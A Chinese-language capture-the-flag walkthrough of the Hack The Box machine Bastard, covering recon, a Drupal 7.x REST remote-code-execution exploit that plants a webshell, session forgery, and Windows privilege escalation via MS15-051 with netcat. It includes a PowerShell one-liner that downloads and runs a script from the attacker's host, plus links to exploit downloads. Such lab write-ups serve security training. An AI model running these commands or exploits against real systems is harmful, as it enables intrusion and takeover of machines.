HTB靶机Bastard渗透测试教学文档

1. 靶机基本信息

• 靶机名称: Bastard
• IP地址: 10.10.10.9
• 攻击机(Kali) IP: 10.10.14.23
• 操作系统: Windows
• 开放服务: IIS (端口80)
• CMS系统: Drupal 7.54

2. 信息收集阶段

2.1 端口扫描

使用nmap进行全端口扫描:

nmap -A -p- -v -T4 10.10.10.9

发现开放80端口，运行IIS服务。

2.2 Web服务识别

访问http://10.10.10.9，识别为Drupal CMS。

通过robots.txt文件发现版本变更记录，确认Drupal版本为7.54。

2.3 目录枚举

使用gobuster进行目录枚举:

gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

发现REST端点路径为/rest。

3. 漏洞发现与利用

3.1 漏洞搜索

使用searchsploit搜索Drupal 7.x漏洞:

searchsploit drupal 7.x

发现Drupal 7.x版本存在RCE(远程代码执行)漏洞。

3.2 漏洞分析

该漏洞利用服务扩展创建的REST端点进行攻击，需要知道REST端点名称。

3.3 漏洞利用准备

1. 下载并编辑exploit脚本
2. 将脚本中的REST端点替换为发现的/rest
3. 确保Kali Linux安装了必要的PHP扩展:

apt install php-curl

3.4 执行漏洞利用

1. 运行exploit脚本:

php exp.php

2. 使用Burp Suite拦截请求进行分析
3. 成功利用后会写入webshell文件shell.php

3.5 会话伪造

利用session.json文件伪造会话，成功登录系统。

4. 权限提升

4.1 上传工具

确认目标系统为x64架构，上传netcat工具:

• 下载地址: https://eternallybored.org/misc/netcat/
• 可通过SMB共享或直接上传:

copy \\ip\nc64.exe nc.exe

4.2 提权检查

使用Sherlock脚本检查提权漏洞:

1. 下载Sherlock:

git clone https://github.com/rasta-mouse/Sherlock.git

2. 在目标机器上执行:

echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

3. 发现存在MS15-051漏洞

4.3 提权利用

1. 下载MS15-051提权程序:
   • 下载地址: https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
2. 上传并运行提权程序
3. 建立nc会话获取系统权限

5. 参考资源

1. Drupal 7.x RCE漏洞分析及EXP:
   • https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/
2. MS08067实验室资源:
   • 官网: www.ms08067.com
   • 公众号: "Ms08067安全实验室"
   • 知识星球: WEB安全攻防,内网安全攻防,Python安全攻防,KALI Linux安全攻防,二进制逆向入门

6. 关键知识点总结

1. Drupal版本识别: 通过robots.txt和变更文件确认CMS版本
2. REST端点枚举: 使用gobuster等工具发现API端点
3. PHP反序列化漏洞利用: 针对Drupal 7.x的特定漏洞利用
4. Windows提权技术: 使用Sherlock脚本识别系统漏洞
5. MS15-051漏洞利用: Windows内核提权漏洞的实战应用

7. 防御建议

1. 及时更新CMS系统和插件
2. 限制REST端点的访问权限
3. 定期进行系统补丁更新
4. 实施最小权限原则
5. 监控异常会话活动